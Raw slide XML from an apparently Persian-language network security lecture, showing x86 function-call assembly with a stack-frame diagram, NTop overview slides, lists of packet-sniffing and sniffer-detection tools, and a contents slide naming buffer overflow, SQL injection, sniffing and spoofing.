            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>	$3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>	$2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>	$1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>call function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng"/>
              <a:t>function prolog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>	%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>	%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>	$20, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14344" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="1752600"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 54167"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14345" name="Freeform 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="2209800"/>
            <a:ext cx="2759075" cy="493713"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1930"/>
              <a:gd name="T1" fmla="*/ 0 h 1"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1930"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
              <a:gd name="T6" fmla="*/ 0 w 1930"/>
              <a:gd name="T7" fmla="*/ 0 h 1"/>
              <a:gd name="T8" fmla="*/ 1930 w 1930"/>
              <a:gd name="T9" fmla="*/ 1 h 1"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T4">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T6" t="T7" r="T8" b="T9"/>
            <a:pathLst>
              <a:path w="1930" h="1">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1930" y="1"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14346" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2286000" y="3429000"/>
            <a:ext cx="2667000" cy="76200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Freeform 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3962400" y="2209800"/>
            <a:ext cx="1258957" cy="2077278"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 437321"/>
              <a:gd name="connsiteY0" fmla="*/ 2080591 h 2080591"/>
              <a:gd name="connsiteX1" fmla="*/ 424069 w 437321"/>
              <a:gd name="connsiteY1" fmla="*/ 940904 h 2080591"/>
              <a:gd name="connsiteX2" fmla="*/ 79513 w 437321"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2080591"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="437321" h="2080591">
                <a:moveTo>
                  <a:pt x="0" y="2080591"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="205408" y="1684130"/>
                  <a:pt x="410817" y="1287669"/>
                  <a:pt x="424069" y="940904"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="437321" y="594139"/>
                  <a:pt x="258417" y="297069"/>
                  <a:pt x="79513" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="31750" cap="rnd" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="oval" w="med" len="med"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>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1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="5562600"/>
            <a:ext cx="2248116" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Current Frame Pointer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(stack pointer)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="Straight Arrow Connector 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="5867400"/>
            <a:ext cx="1548000" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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21"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5</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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1143000" y="214290"/>
            <a:ext cx="7344504" cy="672024"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3800" dirty="0" err="1"/>
              <a:t>NTop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139267" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645103" y="1447801"/>
            <a:ext cx="7741236" cy="4842340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0" smtClean="0"/>
              <a:t>An open-source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0"/>
              <a:t>, portable tool to monitor the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000" dirty="0"/>
              <a:t>Features:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>Capable of handling multiple network interface simultaneously, using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0" err="1"/>
              <a:t>libpcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t> library.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
              <a:t>embedded http server that allows users to view the report through a web browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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50</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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1066800" y="214290"/>
            <a:ext cx="7492142" cy="672024"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3800" dirty="0" err="1"/>
              <a:t>Ntop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3800" dirty="0"/>
              <a:t> Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="148484" name="Picture 4" descr="E:\Users\xinming\2.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="927908" y="1285860"/>
            <a:ext cx="6781376" cy="4886340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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51</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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1219200" y="214290"/>
            <a:ext cx="7268304" cy="672024"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3800" dirty="0" err="1"/>
              <a:t>Ntop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3800" dirty="0"/>
              <a:t> Web Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="150533" name="Picture 5" descr="E:\Users\xinming\5.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1209568" y="1451571"/>
            <a:ext cx="6773582" cy="5072098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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52</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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848600" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ديگر ابزار هاي شنود</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" b="1" dirty="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1000108"/>
            <a:ext cx="8229600" cy="5286412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2800" b="1" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ethereal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>winDump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network Associates Sniffer (for Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BlackICE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Pro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CiAll</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>EtherPeek</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Intellimax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>LanExplorer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Triticom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> LANdecoder32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>SpyNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PeepNet</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ethereal </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sniffit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>snort </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>trinux </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>snoop </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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53</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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924800" cy="1143000"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fa-IR" b="1" smtClean="0">
                <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ابزارهاي شناسايي نرم افزارهاي شنود</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" b="1" dirty="0">
              <a:cs typeface="B Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1524000"/>
            <a:ext cx="8077200" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Anti sniff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>CPM (check promiscuous mode for unix machine)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Neped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (work on local network )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>sentinel</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" dirty="0">
              <a:cs typeface="B Nazanin"/>
            </a:endParaRPr>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54</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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6477000" cy="685800"/>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fa-IR" smtClean="0"/>
              <a:t>فهرست مطالب</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>سرريز بافر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(Buffer Overflow)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>تزريق </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(SQL Injection)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0"/>
              <a:t>شنود </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>(Sniffing)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="084C13"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>جعل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Spoofing)</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR" sz="2400" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
